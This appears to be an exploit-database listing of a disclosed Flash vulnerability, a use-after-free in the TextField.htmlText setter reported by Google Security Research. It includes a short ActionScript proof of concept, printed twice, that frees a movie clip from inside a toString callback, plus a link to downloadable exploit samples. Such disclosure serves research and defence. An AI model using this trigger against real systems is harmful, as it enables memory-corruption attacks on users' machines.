Use-after-free in TextField.htmlText setter

vendor:

N/A

by:

Google Security Research

7,5

CVSS

HIGH

Use-after-free

416

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

Use-after-free in TextField.htmlText setter

There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.htmlText = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return '<b>hello</b>'; }

Mitigation:

Ensure that the htmlText setter is not set to an object with toString defined.

Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=578

There is a use-after-free in the TextField.htmlText setter. If the htmlText the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.htmlText = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "<b>hello</b>";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39051.zip